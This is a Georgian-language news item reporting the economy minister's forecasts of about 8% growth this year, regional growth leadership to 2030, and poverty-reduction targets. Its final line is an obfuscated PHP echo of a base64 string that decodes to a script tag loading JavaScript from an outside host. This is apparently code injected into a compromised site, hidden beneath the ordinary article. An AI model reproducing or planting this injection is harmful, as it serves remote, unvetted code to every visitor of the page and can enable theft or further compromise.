celsiusi
ავერსი საქკაბელი
ეკონომიკისა და მდგრადი განვითარების მინისტრის ნათია თურნავას განცხადებით, ბოლო თვეების განმავლობაში არსებული ეკონომიკური ზრდა იმის ვარაუდის საფუძველს იძლევა, რომ წლის ბოლოს ეს მაჩვენებელი 8%-ს მიაღწევს.
 
როგორც თურნავამ პრეზენტაციაზე - „სააქართველოს ეკონომიკის განვითარება - „ეკონომიკა 2030“ აღნიშნა, შესაძლებელია, რომ საქართველომ ეკონომიკური ზრდის ტემპით რეგიონში კვლავ ლიდერის სტატუსი მოიპოვოს.
 
„პანდემიის ვარდნის შემდეგ, როდესაც 2020 წელს -6,2% გვქონდა ეკონომიკური ვარდნა, ჩვენ კვლავ დავრჩებით და ვიქნებით რეგიონში ეკონომიკური ტემპების თვალსაზრისით ერთ-ერთი ლიდერი სახელმწიფო. ეს ნიშნავს, რომ გვჭირდება გაათმაგებული ძალისხმევა, რომ მივაღწოთ ლიდერის სტატუსს. ბოლო თვეების განმავლობაში ვხედავთ, რომ ეს სავსებით შესაძლებელია. გვქონდა უპრეცედენტო ზრდა აპრილში, უპრეცედენტო ორნიშნა ზრდა მაისში, რაც გვაძლევს საშუალებას ვივარაუდოთ, რომ სულ მცირე 8%-იანი ზრდით დავასრულებთ წელიწადს, რაც ნიშნავს, რომ სრულად გავანულებთ გასული წლის ვარდნას და გადავალთ აბსოლუტურ ზრდაზე. შემდეგ 2025, 2030 წელს კვლავაც შევინარჩუნებთ საშუალოდ 5-5.2%-იან ეკონომიკურ ზრდას, რაც ჩვენ განგვიმტკიცებს ეკონომიკური ზრდის რეგიონალური ლიდერის სტატუსს“,- განაცხადა თურნავამ.
 
თურნავამ ასევე ისაუბრა სიღარიბის დონეზე და აღნიშნა, რომ მთავრობის ამოცანაა, 2025 წელს სიღარიბის მაჩვენებელი 15%, 2030 წელს კი 10%-ზე ნაკლები იყოს.
 
„ჩვენი ხელისუფლების ფარგლებში, მიზანმიმართული სოციალური პროგრამის ფარგლებში, როდესაც ჩვენ ეკონომიკური ზრდის სიკეთეს საბიუჯეტო პოლიტიკის მეშვეობით ვანაწილებთ სწორედ იმ ჯგუფების მიმართ, ვისაც ეს ყველაზე მეტად სჭირდება, ჩვენი ადგილობრივი წარმოების წახალისების პოლიტიკის წყალობით, მცირე ბიზნესის განვითარების შედეგად ჩვენ მოვახერხეთ და გავანახევრეთ სიღარიბის მაჩვენებელი, 2019 წელს იყო 19%, ანუ იმის ნახევარი, რა გვქონდა, მაგალითად 2007 წელს. თუმცა ეს არაა საკმარისი მაჩვენებელი. განსაკუთრებით ახლა, როდესაც სრულიად მსოფლიო დადგა პანდემიის გამო დამატებით სიღარიბის ზრდის გამოწვევის წინაშე და მთელი მსოფლიოს მასშტაბით 180 მლნ-ზე მეტი ადამიანი აღმოჩნდა სიღარიბის ზღვარს მიღმა, უნდა გავაორმაგოთ ძალისხმევა. ჩვენი ამოცანაა, რომ 2025 წლისთვის პრაქტიკულად 15%-ს უკიდურესი სიღარიბის მაჩვენებელი არ აჭარბებდეს, ხოლო 2030 წლისთვის 10% და უფრო ნაკლები იყოს, ეს იქნება გამარჯვება“,- განაცხადა თურნავამ.
1162
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");